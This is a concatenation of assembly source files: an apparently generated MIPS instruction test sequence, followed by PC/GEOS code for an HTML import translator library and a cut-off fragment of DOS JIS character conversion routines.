14 blez $1, TAG456 lui $3, 14 srlv $3, $3, $1 TAG456: lui $4, 15 xor $3, $4, $4 blez $4, TAG457 sll $0, $0, 0 TAG457: bltz $1, TAG458 sra $4, $1, 2 lui $2, 14 lui $4, 14 TAG458: sll $0, $0, 0 sll $0, $0, 0 lui $4, 12 srlv $4, $3, $4 TAG459: mult $4, $4 bne $4, $4, TAG460 mthi $4 add $3, $4, $4 TAG460: sb $3, 0($3) lb $1, 0($3) sh $3, 0($3) sh $1, 0($1) TAG461: sw $1, 0($1) add $2, $1, $1 bne $2, $2, TAG462 mtlo $1 TAG462: sb $2, 0($2) sb $2, 0($2) lh $4, 0($2) lui $1, 1 TAG463: nor $1, $1, $1 sll $0, $0, 0 sll $0, $0, 0 bgez $1, TAG464 TAG464: lui $4, 12 sll $0, $0, 0 divu $4, $4 bne $2, $2, TAG465 TAG465: addiu $2, $4, 12 bne $2, $2, TAG466 mtlo $2 lui $2, 2 TAG466: bgtz $2, TAG467 lui $2, 15 lhu $1, 0($2) mflo $4 TAG467: sll $0, $0, 0 lui $1, 11 or $1, $4, $1 mfhi $4 TAG468: blez $4, TAG469 lh $3, 0($4) sw $4, 0($3) lh $3, 0($3) TAG469: mthi $3 lh $4, 0($3) mfhi $4 sra $4, $4, 10 TAG470: mult $4, $4 lh $2, 0($4) sb $4, 0($2) mthi $2 TAG471: mfhi $1 lbu $2, 0($2) lui $1, 1 sb $1, 0($2) TAG472: lui $4, 4 mthi $1 mflo $3 sll $0, $0, 0 TAG473: sh $3, 0($3) lb $1, 0($3) lh $3, 0($3) sb $3, 0($3) TAG474: beq $3, $3, TAG475 mthi $3 xor $3, $3, $3 mtlo $3 TAG475: xori $3, $3, 11 mfhi $4 bltz $3, TAG476 div $4, $3 TAG476: lui $1, 11 mthi $4 sll $0, $0, 0 lui $2, 4 TAG477: bgtz $2, TAG478 divu $2, $2 lui $3, 0 blez $2, TAG478 TAG478: lui $1, 7 multu $3, $1 mflo $3 sll $0, $0, 0 TAG479: sll $0, $0, 0 bne $3, $3, TAG480 mtlo $3 srl $4, $3, 10 TAG480: sll $0, $0, 0 sb $1, -4928($4) divu $1, $1 bltz $1, TAG481 TAG481: xor $2, $1, $1 bltz $1, TAG482 mfhi $4 andi $2, $4, 6 TAG482: sh $2, 0($2) slt $2, $2, $2 mtlo $2 lui $3, 11 TAG483: bgez $3, TAG484 div $3, $3 sb $3, 0($3) andi $1, $3, 10 TAG484: sltu $3, $1, $1 addiu $2, $1, 14 blez $3, TAG485 mthi $1 TAG485: sll $0, $0, 0 mfhi $3 mflo $2 andi $2, $3, 13 TAG486: lb $1, 0($2) blez $2, TAG487 mthi $2 bne $1, $1, TAG487 TAG487: sb $1, 0($1) lui $1, 11 mflo $2 mtlo $1 TAG488: sb $2, 0($2) lui $2, 3 lui $1, 12 sll $0, $0, 0 TAG489: slti $3, $1, 6 mtlo $3 addiu $1, $1, 11 lui $4, 15 TAG490: sltu $2, $4, $4 mflo $4 sltiu $2, $4, 7 sb $4, 0($2) TAG491: xor $4, $2, $2 blez $4, TAG492 multu $4, $4 div $2, $2 TAG492: lh $1, 0($4) lui $4, 5 mthi $1 addiu $2, $1, 5 TAG493: subu $1, $2, $2 multu $1, $2 mult $1, $1 bne $1, $1, TAG494 TAG494: sb $1, 0($1) lw $2, 0($1) lui $1, 3 lui $1, 3 TAG495: sll $0, $0, 0 sll $0, $0, 0 andi $1, $1, 3 mflo $2 TAG496: lw $4, 0($2) blez $4, TAG497 lb $1, 0($4) mfhi $4 TAG497: mult $4, $4 lui $3, 12 subu $1, $4, $3 mflo $1 TAG498: lui $2, 8 mtlo $2 lhu $2, 0($1) lui $2, 10 TAG499: mthi $2 sll $0, $0, 0 bltz $2, TAG500 add $2, $4, $4 TAG500: bgtz $2, TAG501 mtlo $2 lui $4, 8 mtlo $2 TAG501: sll $0, $0, 0 lh $1, 0($1) mflo $3 lui $2, 13 TAG502: lui $2, 3 sllv $1, $2, $2 div $2, $1 bne $2, $2, TAG503 TAG503: sll $0, $0, 0 divu $1, $1 sll $0, $0, 0 mthi $1 TAG504: div $2, $2 sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 TAG505: lbu $3, 0($3) sra $1, $3, 11 lw $1, 0($1) bltz $3, TAG506 TAG506: sb $1, 0($1) lh $1, 0($1) mflo $2 sltiu $4, $1, 9 TAG507: subu $1, $4, $4 mtlo $4 multu $4, $4 xori $4, $4, 8 TAG508: lui $3, 2 lui $2, 0 subu $3, $2, $2 mthi $3 TAG509: lb $2, 0($3) lui $1, 7 mflo $1 mflo $1 TAG510: mtlo $1 lb $3, 0($1) lb $2, 0($1) multu $3, $2 TAG511: mult $2, $2 lui $1, 11 bgez $2, TAG512 mthi $2 TAG512: sll $0, $0, 0 addiu $2, $1, 9 bne $1, $1, TAG513 and $1, $1, $1 TAG513: lui $1, 1 mflo $4 sll $0, $0, 0 sltiu $3, $1, 1 TAG514: beq $3, $3, TAG515 slt $4, $3, $3 multu $3, $3 div $3, $3 TAG515: mflo $3 sb $3, 0($4) sb $3, 0($4) lui $1, 14 TAG516: addu $3, $1, $1 ori $2, $1, 8 or $4, $3, $3 lui $4, 10 TAG517: mthi $4 mthi $4 lui $3, 8 srl $4, $4, 4 TAG518: addiu $3, $4, 0 beq $3, $4, TAG519 sll $0, $0, 0 mthi $4 TAG519: mflo $2 lui $4, 12 sll $0, $0, 0 div $1, $3 TAG520: bne $1, $1, TAG521 mfhi $4 lui $3, 1 srlv $3, $1, $1 TAG521: mthi $3 mthi $3 div $3, $3 addu $3, $3, $3 TAG522: mflo $2 mult $2, $3 sb $2, 0($2) beq $3, $3, TAG523 TAG523: mflo $3 mthi $2 multu $3, $2 mflo $1 TAG524: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 blez $1, TAG525 TAG525: mthi $1 mthi $1 sll $0, $0, 0 or $1, $1, $1 TAG526: sll $0, $0, 0 lui $1, 8 div $1, $4 beq $1, $1, TAG527 TAG527: mult $1, $1 lui $1, 12 sltiu $2, $1, 10 sll $0, $0, 0 TAG528: beq $2, $2, TAG529 lui $4, 6 blez $2, TAG529 sh $2, 0($2) TAG529: or $2, $4, $4 sll $0, $0, 0 lui $1, 7 lui $3, 9 TAG530: sllv $3, $3, $3 blez $3, TAG531 div $3, $3 sll $0, $0, 0 TAG531: sll $0, $0, 0 bne $2, $2, TAG532 sll $0, $0, 0 sra $2, $2, 11 TAG532: sb $2, -192($2) sh $2, -192($2) slt $4, $2, $2 lui $2, 13 TAG533: sll $0, $0, 0 lui $3, 13 subu $3, $3, $2 sll $0, $0, 0 TAG534: sw $3, 0($3) lui $2, 7 mult $3, $2 mfhi $1 TAG535: and $4, $1, $1 beq $4, $1, TAG536 mflo $4 srav $1, $4, $4 TAG536: bgtz $1, TAG537 mflo $1 lui $2, 12 bne $2, $1, TAG537 TAG537: slt $3, $2, $2 bgez $2, TAG538 ori $1, $2, 7 mflo $1 TAG538: divu $1, $1 sll $0, $0, 0 beq $1, $1, TAG539 and $4, $1, $1 TAG539: subu $4, $4, $4 lui $2, 8 bltz $4, TAG540 add $1, $4, $4 TAG540: lhu $1, 0($1) bltz $1, TAG541 addi $2, $1, 13 andi $2, $2, 2 TAG541: multu $2, $2 sb $2, 0($2) mthi $2 lbu $2, 0($2) TAG542: mfhi $1 sb $1, 0($2) lb $2, 0($1) mult $1, $2 TAG543: lui $4, 8 mfhi $3 bne $3, $2, TAG544 mflo $1 TAG544: sllv $2, $1, $1 mflo $4 lhu $2, 0($4) mflo $3 TAG545: bne $3, $3, TAG546 xor $2, $3, $3 mult $2, $3 lui $1, 14 TAG546: mult $1, $1 addu $3, $1, $1 bgtz $3, TAG547 divu $3, $3 TAG547: mthi $3 sll $0, $0, 0 srl $3, $3, 7 mfhi $1 TAG548: mflo $1 mflo $1 blez $1, TAG549 lui $2, 14 TAG549: sll $0, $0, 0 mtlo $1 sll $0, $0, 0 sll $0, $0, 0 TAG550: lui $4, 8 bgtz $4, TAG551 sll $0, $0, 0 beq $4, $4, TAG551 TAG551: srl $3, $4, 4 mflo $4 lui $3, 5 mflo $3 TAG552: slti $3, $3, 2 divu $3, $3 multu $3, $3 bne $3, $3, TAG553 TAG553: mflo $3 mtlo $3 bgtz $3, TAG554 nor $1, $3, $3 TAG554: sll $0, $0, 0 mtlo $2 srav $4, $1, $1 srl $3, $2, 8 TAG555: bne $3, $3, TAG556 mflo $2 lui $1, 9 sltiu $4, $3, 10 TAG556: mult $4, $4 mfhi $1 lui $3, 12 sll $0, $0, 0 TAG557: srlv $3, $4, $4 mthi $4 sb $3, 0($4) bgtz $3, TAG558 TAG558: mflo $1 xori $1, $1, 9 sll $1, $1, 11 lh $3, -18432($1) TAG559: lh $1, 0($3) mflo $1 srav $1, $1, $1 sh $1, 0($1) TAG560: mflo $2 ori $2, $2, 4 slti $1, $2, 2 mfhi $4 TAG561: lui $3, 3 mult $4, $4 lui $2, 12 mthi $4 TAG562: sltiu $4, $2, 8 multu $2, $2 blez $2, TAG563 lui $1, 11 TAG563: sll $0, $0, 0 mtlo $1 sll $0, $0, 0 mtlo $4 TAG564: mult $4, $4 sb $4, 0($4) lhu $2, 0($4) bltz $2, TAG565 TAG565: lw $4, 0($2) lui $1, 5 lh $4, 0($4) sh $2, 0($4) TAG566: multu $4, $4 beq $4, $4, TAG567 mthi $4 lui $4, 14 TAG567: mthi $4 xori $4, $4, 7 mfhi $2 div $4, $4 TAG568: add $2, $2, $2 multu $2, $2 lui $2, 11 lui $4, 4 TAG569: mthi $4 sll $0, $0, 0 mfhi $1 lui $4, 8 TAG570: addiu $1, $4, 10 divu $1, $1 bgtz $1, TAG571 mtlo $4 TAG571: mfhi $4 or $4, $1, $4 lui $4, 7 multu $1, $4 TAG572: sll $0, $0, 0 mult $3, $3 lui $1, 3 beq $1, $4, TAG573 TAG573: mthi $1 sll $0, $0, 0 bne $2, $1, TAG574 sltiu $1, $2, 14 TAG574: addi $4, $1, 1 bltz $4, TAG575 lb $2, 0($4) sll $2, $4, 7 TAG575: beq $2, $2, TAG576 mflo $4 mult $4, $4 mflo $3 TAG576: sra $4, $3, 12 bltz $4, TAG577 sb $4, 0($4) sb $4, 0($4) TAG577: addu $1, $4, $4 bne $1, $4, TAG578 lb $4, 0($1) bne $1, $4, TAG578 TAG578: lh $1, 0($4) sltu $1, $1, $1 bgez $1, TAG579 add $4, $1, $4 TAG579: ori $3, $4, 12 beq $4, $3, TAG580 sh $4, 0($3) bltz $3, TAG580 TAG580: sltiu $2, $3, 13 xor $3, $3, $2 subu $1, $2, $3 mflo $2 TAG581: sw $2, 0($2) mult $2, $2 lui $1, 0 beq $2, $1, TAG582 TAG582: xor $4, $1, $1 or $3, $4, $4 mfhi $1 mthi $3 TAG583: srlv $2, $1, $1 lhu $2, 0($1) lbu $2, 0($2) sw $2, 0($2) TAG584: lui $4, 2 mthi $4 sra $3, $4, 12 sll $0, $0, 0 TAG585: lui $2, 15 sb $2, 0($3) bltz $2, TAG586 divu $3, $3 TAG586: mtlo $2 mflo $4 lui $3, 11 sltu $2, $4, $2 TAG587: lui $1, 5 srl $3, $2, 3 nor $2, $1, $2 mult $3, $3 TAG588: beq $2, $2, TAG589 slti $3, $2, 12 xor $2, $3, $3 multu $2, $2 TAG589: lui $2, 0 lui $1, 3 sra $1, $1, 0 mtlo $1 TAG590: lui $2, 0 div $2, $1 bltz $1, TAG591 srl $3, $2, 7 TAG591: sh $3, 0($3) lhu $3, 0($3) beq $3, $3, TAG592 sh $3, 0($3) TAG592: multu $3, $3 mtlo $3 bltz $3, TAG593 lui $2, 7 TAG593: lui $4, 9 lui $2, 7 lui $2, 4 multu $2, $2 TAG594: bltz $2, TAG595 sll $0, $0, 0 addiu $1, $2, 6 sll $0, $0, 0 TAG595: bne $2, $2, TAG596 mfhi $4 mult $2, $2 bltz $4, TAG596 TAG596: lb $4, 0($4) bltz $4, TAG597 ori $3, $4, 6 mflo $4 TAG597: sltiu $4, $4, 6 mtlo $4 div $4, $4 sb $4, 0($4) TAG598: blez $4, TAG599 mtlo $4 divu $4, $4 sll $3, $4, 15 TAG599: mflo $1 lbu $4, 0($1) bgez $3, TAG600 xor $1, $3, $4 TAG600: slt $1, $1, $1 lh $2, 0($1) bne $2, $2, TAG601 mtlo $2 TAG601: subu $1, $2, $2 lh $3, 0($1) mtlo $3 lhu $4, -256($3) TAG602: sb $4, -256($4) sh $4, -256($4) lui $1, 6 xor $3, $1, $1 TAG603: beq $3, $3, TAG604 lb $2, 0($3) beq $3, $3, TAG604 mfhi $1 TAG604: mtlo $1 addiu $4, $1, 4 mtlo $4 divu $4, $1 TAG605: sra $4, $4, 5 lui $1, 7 mthi $4 srlv $2, $4, $4 TAG606: div $2, $2 sll $3, $2, 8 bgez $3, TAG607 sh $3, -12288($2) TAG607: mflo $2 mfhi $1 sll $3, $1, 11 srl $1, $1, 2 TAG608: multu $1, $1 beq $1, $1, TAG609 multu $1, $1 mthi $1 TAG609: sh $1, 0($1) bltz $1, TAG610 mtlo $1 mtlo $1 TAG610: mult $1, $1 lw $2, 0($1) lui $1, 13 blez $2, TAG611 TAG611: mfhi $3 mult $3, $3 divu $1, $1 bne $1, $3, TAG612 TAG612: mfhi $1 lui $3, 0 blez $3, TAG613 mflo $2 TAG613: lb $3, 0($2) lbu $1, 0($2) lui $3, 7 bne $3, $1, TAG614 TAG614: mfhi $2 mult $3, $3 mult $3, $2 bne $3, $2, TAG615 TAG615: multu $2, $2 mult $2, $2 addi $3, $2, 12 lui $2, 5 TAG616: srl $2, $2, 14 mtlo $2 mfhi $4 beq $2, $2, TAG617 TAG617: lb $3, 0($4) multu $3, $4 srlv $4, $3, $4 multu $4, $3 TAG618: mflo $1 blez $4, TAG619 mfhi $3 nor $4, $1, $1 TAG619: lui $4, 12 mfhi $4 lh $1, 0($4) mtlo $4 TAG620: slt $3, $1, $1 bne $1, $3, TAG621 lui $2, 6 mflo $4 TAG621: lw $1, 0($4) sb $4, 0($4) blez $4, TAG622 xor $1, $4, $1 TAG622: mtlo $1 beq $1, $1, TAG623 mflo $2 mtlo $2 TAG623: beq $2, $2, TAG624 multu $2, $2 bgez $2, TAG624 lhu $2, 0($2) TAG624: bgez $2, TAG625 lhu $4, 0($2) bgtz $2, TAG625 sll $3, $2, 12 TAG625: multu $3, $3 mthi $3 mflo $4 bgez $4, TAG626 TAG626: sh $4, 0($4) mflo $4 bgez $4, TAG627 add $1, $4, $4 TAG627: sltiu $2, $1, 10 addiu $2, $2, 4 beq $2, $2, TAG628 nor $1, $2, $1 TAG628: mult $1, $1 lui $2, 5 beq $2, $1, TAG629 mflo $2 TAG629: andi $3, $2, 11 lw $1, 0($3) lui $4, 8 addiu $4, $4, 7 TAG630: mult $4, $4 sll $0, $0, 0 beq $4, $1, TAG631 sll $0, $0, 0 TAG631: mfhi $3 beq $1, $3, TAG632 mthi $3 lb $1, 0($1) TAG632: mult $1, $1 lui $3, 3 blez $1, TAG633 mtlo $1 TAG633: mfhi $3 addi $1, $3, 10 lbu $4, 0($3) andi $4, $3, 6 TAG634: sh $4, 0($4) sh $4, 0($4) add $2, $4, $4 lb $3, 0($4) TAG635: lui $2, 13 mfhi $4 sh $4, 0($4) sra $2, $3, 2 TAG636: sub $1, $2, $2 mult $2, $1 beq $2, $2, TAG637 multu $2, $2 TAG637: lh $1, 0($1) sub $4, $1, $1 subu $3, $4, $1 mtlo $4 TAG638: multu $3, $3 sh $3, 0($3) andi $1, $3, 0 multu $3, $3 TAG639: mtlo $1 multu $1, $1 mult $1, $1 sub $3, $1, $1 TAG640: mult $3, $3 lbu $4, 0($3) mfhi $2 bgtz $4, TAG641 TAG641: lbu $1, 0($2) ori $3, $2, 13 srlv $1, $3, $3 bgtz $1, TAG642 TAG642: lui $3, 1 bgtz $1, TAG643 lui $1, 8 divu $3, $1 TAG643: sll $0, $0, 0 beq $1, $1, TAG644 subu $1, $1, $1 bne $1, $1, TAG644 TAG644: sltiu $2, $1, 9 lui $1, 0 bne $1, $1, TAG645 lbu $3, 0($2) TAG645: bne $3, $3, TAG646 lh $3, 0($3) sb $3, 0($3) mflo $3 TAG646: multu $3, $3 mthi $3 beq $3, $3, TAG647 andi $2, $3, 8 TAG647: sb $2, 0($2) addu $1, $2, $2 slt $2, $1, $1 sb $2, 0($2) TAG648: lui $3, 8 lb $3, 0($2) bltz $2, TAG649 mthi $3 TAG649: mflo $1 lui $4, 11 and $2, $4, $3 bgtz $2, TAG650 TAG650: sb $2, 0($2) lui $4, 9 addu $4, $4, $4 sll $0, $0, 0 TAG651: sll $0, $0, 0 lui $2, 12 bgez $4, TAG652 lui $2, 6 TAG652: mtlo $2 mtlo $2 sll $0, $0, 0 sltu $4, $2, $2 TAG653: mthi $4 mflo $3 multu $4, $4 multu $3, $3 TAG654: blez $3, TAG655 addiu $2, $3, 12 mtlo $2 sllv $1, $2, $3 TAG655: mfhi $4 divu $1, $4 sll $0, $0, 0 divu $4, $1 TAG656: sltu $3, $4, $4 mfhi $4 addu $4, $4, $4 bltz $4, TAG657 TAG657: sllv $1, $4, $4 div $1, $4 beq $4, $4, TAG658 srav $4, $4, $1 TAG658: bgez $4, TAG659 lui $1, 15 mult $4, $1 mult $4, $4 TAG659: bgez $1, TAG660 mthi $1 lw $2, 0($1) bgez $1, TAG660 TAG660: lui $1, 15 divu $1, $2 mthi $2 lui $3, 4 TAG661: mfhi $2 mtlo $3 addiu $2, $2, 7 bgtz $2, TAG662 TAG662: sll $0, $0, 0 sll $0, $0, 0 lui $1, 10 mfhi $4 TAG663: subu $3, $4, $4 mtlo $3 beq $4, $4, TAG664 and $4, $4, $3 TAG664: beq $4, $4, TAG665 lui $3, 13 sw $3, 0($3) bltz $3, TAG665 TAG665: mtlo $3 sll $0, $0, 0 xori $2, $1, 10 bne $1, $1, TAG666 TAG666: mflo $3 mtlo $3 mtlo $2 mfhi $2 TAG667: lui $4, 15 sll $0, $0, 0 addu $2, $4, $4 addu $1, $4, $2 TAG668: blez $1, TAG669 lui $4, 14 mflo $3 sra $2, $3, 10 TAG669: bgtz $2, TAG670 lbu $2, -640($2) mfhi $3 mfhi $3 TAG670: div $3, $3 div $3, $3 sll $0, $0, 0 lui $4, 14 TAG671: mtlo $4 slti $1, $4, 12 bgtz $4, TAG672 or $1, $1, $4 TAG672: sll $0, $0, 0 div $1, $1 divu $1, $3 mflo $4 TAG673: bne $4, $4, TAG674 mult $4, $4 mthi $4 xori $1, $4, 11 TAG674: lh $4, 0($1) sw $1, -2826($4) mthi $1 ori $2, $1, 5 TAG675: bgtz $2, TAG676 addiu $2, $2, 11 sw $2, 0($2) lhu $2, 0($2) TAG676: subu $2, $2, $2 lui $1, 12 divu $1, $1 multu $2, $1 TAG677: lui $3, 1 subu $2, $1, $3 beq $3, $2, TAG678 mtlo $2 TAG678: mflo $4 mflo $4 bgtz $4, TAG679 xori $2, $2, 12 TAG679: sll $0, $0, 0 and $4, $2, $2 bgez $4, TAG680 lui $1, 1 TAG680: mult $1, $1 sll $0, $0, 0 sll $0, $0, 0 mtlo $4 TAG681: mthi $4 sll $0, $0, 0 sll $0, $0, 0 bne $4, $4, TAG682 TAG682: mflo $2 lui $3, 4 xor $4, $2, $4 bne $4, $4, TAG683 TAG683: mult $4, $4 lui $2, 3 mflo $3 mult $2, $4 TAG684: sub $1, $3, $3 lui $3, 11 srav $3, $3, $3 sll $0, $0, 0 TAG685: sll $0, $0, 0 sll $0, $0, 0 mfhi $3 mthi $2 TAG686: bne $3, $3, TAG687 lbu $4, 0($3) blez $4, TAG687 lbu $1, 0($3) TAG687: beq $1, $1, TAG688 lb $3, 0($1) bgez $3, TAG688 multu $3, $3 TAG688: lh $4, 0($3) sb $3, 0($3) ori $1, $4, 1 mthi $1 TAG689: bgtz $1, TAG690 addu $3, $1, $1 mthi $1 xor $2, $1, $3 TAG690: bltz $2, TAG691 mflo $4 mtlo $4 multu $4, $2 TAG691: lb $3, 0($4) lui $2, 7 div $4, $2 sltiu $3, $4, 14 TAG692: mtlo $3 lbu $1, 0($3) sb $1, 0($3) bltz $1, TAG693 TAG693: sltiu $3, $1, 13 bltz $1, TAG694 sb $1, 0($3) lui $3, 0 TAG694: bgez $3, TAG695 mflo $1 mthi $3 mtlo $3 TAG695: div $1, $1 lb $3, 0($1) lui $2, 9 mfhi $3 TAG696: mult $3, $3 or $3, $3, $3 andi $1, $3, 7 srlv $2, $1, $3 TAG697: bltz $2, TAG698 xor $2, $2, $2 lui $2, 8 sll $0, $0, 0 TAG698: or $1, $3, $3 beq $3, $3, TAG699 lw $3, 0($3) nor $1, $3, $3 TAG699: lui $4, 3 mtlo $1 sltiu $2, $4, 9 mfhi $4 TAG700: mflo $3 mfhi $4 lui $2, 6 mthi $4 TAG701: mtlo $2 sll $0, $0, 0 lui $4, 1 beq $2, $4, TAG702 TAG702: ori $3, $4, 8 mthi $3 mult $4, $4 sll $0, $0, 0 TAG703: sll $0, $0, 0 addiu $4, $2, 3 sll $0, $0, 0 mflo $2 TAG704: add $4, $2, $2 andi $4, $4, 3 addiu $3, $4, 6 bgez $4, TAG705 TAG705: mfhi $3 andi $4, $3, 13 sllv $1, $4, $3 beq $3, $3, TAG706 TAG706: mthi $1 mthi $1 lui $4, 8 addiu $4, $4, 5 TAG707: sltu $3, $4, $4 bgtz $4, TAG708 and $3, $4, $4 add $2, $3, $3 TAG708: lw $3, 0($2) srlv $4, $2, $3 mthi $3 srlv $3, $2, $4 TAG709: lhu $2, 0($3) mflo $2 mthi $2 xor $2, $3, $2 TAG710: beq $2, $2, TAG711 sw $2, 0($2) bgez $2, TAG711 mfhi $2 TAG711: bne $2, $2, TAG712 sb $2, 0($2) bne $2, $2, TAG712 andi $1, $2, 5 TAG712: lh $1, 0($1) sw $1, 0($1) lh $1, 0($1) mult $1, $1 TAG713: bne $1, $1, TAG714 sw $1, 0($1) lui $2, 9 bgtz $2, TAG714 TAG714: sll $3, $2, 15 mfhi $2 sb $2, 0($2) mflo $2 TAG715: beq $2, $2, TAG716 lbu $1, 0($2) bgez $1, TAG716 mthi $2 TAG716: beq $1, $1, TAG717 multu $1, $1 lb $2, 0($1) nor $1, $2, $2 TAG717: mfhi $1 beq $1, $1, TAG718 mfhi $4 addu $4, $4, $1 TAG718: and $2, $4, $4 ori $3, $4, 2 bne $3, $2, TAG719 sb $2, 0($3) TAG719: beq $3, $3, TAG720 addu $3, $3, $3 sb $3, 0($3) bgtz $3, TAG720 TAG720: mflo $2 sw $3, 0($3) mflo $4 lb $2, 0($2) TAG721: mtlo $2 ori $4, $2, 4 lui $4, 14 bgez $4, TAG722 TAG722: lui $2, 14 sll $0, $0, 0 mtlo $4 andi $2, $4, 11 TAG723: mthi $2 lui $1, 7 mfhi $3 lui $3, 11 TAG724: sll $0, $0, 0 addu $1, $1, $3 sll $0, $0, 0 beq $1, $1, TAG725 TAG725: mtlo $1 slt $1, $1, $1 blez $1, TAG726 mflo $1 TAG726: sll $0, $0, 0 mflo $4 div $4, $4 andi $2, $1, 2 TAG727: sb $2, 0($2) blez $2, TAG728 lb $1, 0($2) sh $2, 0($2) TAG728: multu $1, $1 lui $2, 4 mthi $2 mfhi $1 TAG729: sll $0, $0, 0 mfhi $1 bgtz $3, TAG730 lui $3, 15 TAG730: mult $3, $3 mthi $3 blez $3, TAG731 sll $0, $0, 0 TAG731: mtlo $3 srav $3, $3, $3 lui $1, 8 sll $0, $0, 0 TAG732: lui $3, 4 sll $0, $0, 0 mtlo $3 addiu $1, $3, 11 TAG733: sll $0, $0, 0 bltz $1, TAG734 lui $4, 5 sll $0, $0, 0 TAG734: and $2, $4, $4 bne $2, $2, TAG735 mflo $1 div $4, $1 TAG735: lui $4, 2 sll $0, $0, 0 sll $0, $0, 0 blez $4, TAG736 TAG736: sll $0, $0, 0 sll $1, $2, 6 bne $1, $2, TAG737 sll $0, $0, 0 TAG737: srav $4, $1, $1 mfhi $2 sll $0, $0, 0 lui $2, 9 TAG738: mult $2, $2 bgtz $2, TAG739 mfhi $1 andi $4, $2, 1 TAG739: mthi $4 sll $0, $0, 0 mult $4, $4 bne $4, $4, TAG740 TAG740: andi $1, $4, 2 multu $4, $1 lui $3, 8 subu $1, $1, $3 TAG741: srav $2, $1, $1 nor $4, $1, $2 beq $2, $1, TAG742 mtlo $2 TAG742: blez $4, TAG743 mtlo $4 or $4, $4, $4 mult $4, $4 TAG743: addiu $4, $4, 3 sll $0, $0, 0 mthi $2 mult $4, $2 TAG744: sll $0, $0, 0 lui $1, 15 beq $1, $2, TAG745 srlv $4, $1, $1 TAG745: sltiu $1, $4, 14 sltiu $2, $4, 1 sw $4, 0($1) bltz $4, TAG746 TAG746: sh $2, 0($2) lw $3, 0($2) ori $3, $3, 3 bltz $3, TAG747 TAG747: lui $3, 11 srlv $2, $3, $3 div $3, $2 mfhi $1 TAG748: beq $1, $1, TAG749 lui $1, 7 andi $1, $1, 11 sh $1, 0($1) TAG749: sll $0, $0, 0 xor $4, $1, $1 blez $4, TAG750 lui $2, 4 TAG750: nop nop test_end: beq $0, $0, test_end nop
Library/Trans/Web/HtmlImpx/htmlimpt/htmlimptManager.asm	steakknife/pcgeos	504	176252	<filename>Library/Trans/Web/HtmlImpx/htmlimpt/htmlimptManager.asm include stdapp.def include vm.def include impex.def include Objects/gCtrlC.def ; segment must be "public 'CODE'" to ensure that it combines ; properly with the C segment of the same name. imptproc_TEXT segment byte public 'CODE' extrn IMPROTPROCEDURE: far extrn GETFORMAT: far imptproc_TEXT ends exptproc_TEXT segment byte public 'CODE' extrn EXPORTPROCEDURE: far exptproc_TEXT ends global LibraryEntry: far global TransExport: far global TransImport: far global TransGetFormat: far global TransGetImportUI: far global TransGetExportUI: far global TransInitImportUI: far global TransInitExportUI: far global TransGetImportOptions: far global TransGetExportOptions: far INIT segment resource assume cs:INIT db "OK" dw InfoResource ; resource containing format names dw 1 ; contains one sub-format dw mask IDC_TEXT ; this is a text translator db "OK" LibraryEntry proc far clc ret LibraryEntry endp INIT ends ASM segment resource assume cs:ASM TransExport proc far uses es,ds,si,di .enter push ds ; arg 1: pointer to export data block push si call EXPORTPROCEDURE ; Call high-level procedure to do work ; AX returns error code .leave ret TransExport endp TransImport proc far uses es,ds,si,di _vmc local dword .enter push ds ; arg 1: pointer to import data block push si push ss ; arg 2: pointer to vm chain return buf lea ax,_vmc push ax call EXPORTPROCEDURE ; Call high-level procedure to do work mov bx,dx ; BX:AX returns error code or format ID movdw dxcx,_vmc ; VMChain of object returned in DX:CX .leave ret TransImport endp TransGetFormat proc far uses es,ds,si,di,bx,dx .enter push si ; handle of file to be tested mov ax,idata ; DS=dgroup mov ds,ax call GETFORMAT ; Call high-level procedure to do work mov cx,ax ; return word value xor ax,ax .leave retf TransGetFormat endp TransGetImportUI proc far mov bp,4 ; offset of pointer in info entry push di push ds mov bx,handle InfoResource call MemLock mov ds,ax mov ax,14 ; size of one entry mul cx mov di,offset infoTable add di,ax mov cx,[ds:bp+di+002h] mov dx,[ds:bp+di] call MemUnlock xor ax,ax mov bx,ax pop ds pop di ret TransGetImportUI endp TransGetExportUI proc far xor cx,cx ret TransGetExportUI endp TransGetImportOptions proc far push ax push cx push bx push bp push si push di push ds cmp dx,0 ; UI not yet initialized? je iopt_err ; return no options (null handle) mov ax,MSG_GEN_BOOLEAN_GROUP_GET_SELECTED_BOOLEANS mov bx,dx mov si,offset booleanOptions mov di,mask MF_CALL call ObjMessage push ax mov ax,00002h mov cl,050h mov ch,040h call MemAlloc xor dx,dx jc iopt_err push ax pop ds pop ax mov [ds:00000h],ax ; booleanOptions call MemUnlock mov dx,bx clc iopt_err: pop ds pop di pop si pop bp pop bx pop cx pop ax ret TransGetImportOptions endp TransGetExportOptions proc far xor dx,dx ret TransGetExportOptions endp TransInitImportUI proc far ret TransInitImportUI endp TransInitExportUI proc far ret TransInitExportUI endp ASM ends include htmlimpt.rdef InfoResource segment lmem LMEM_TYPE_GENERAL,mask LMF_IN_RESOURCE infoTable dw fmt_1_name,fmt_1_mask D_OPTR ImportSettings dw 0,0 dw 0C000h ; we support import and export dw 0 fmt_1_name chunk char char "HTML (Hypertext Markup Language)",0 fmt_1_name endc fmt_1_mask chunk char char "*.htm",0 fmt_1_mask endc InfoResource ends
Driver/IFS/DOS/Common/dosConvertJIS.asm	steakknife/pcgeos	504	3694	COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1993 -- All Rights Reserved PROJECT: PC GEOS MODULE: FILE: dosConvertJIS.asm AUTHOR: <NAME>, Dec 21, 1993 ROUTINES: Name Description ---- ----------- REVISION HISTORY: Name Date Description ---- ---- ----------- Gene 12/21/93 Initial revision DESCRIPTION: Code for JIS support. $Id: dosConvertJIS.asm,v 1.1 97/04/10 11:55:13 newdeal Exp $ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ Resident segment resource DosJISToGeosChar proc near call DosJISToGeosCharFar ret DosJISToGeosChar endp GeosToDosJISChar proc near call GeosToDosJISCharFar ret GeosToDosJISChar endp DosJISToGeosCharString proc near call DosJISToGeosCharStringFar ret DosJISToGeosCharString endp GeosToDosJISCharString proc near call GeosToDosJISCharStringFar ret GeosToDosJISCharString endp DosSJISToGeosCharFar proc far call DosSJISToGeosChar ret DosSJISToGeosCharFar endp GeosToDosSJISCharFar proc far call GeosToDosSJISChar ret GeosToDosSJISCharFar endp Resident ends ConvertRare segment resource COMMENT 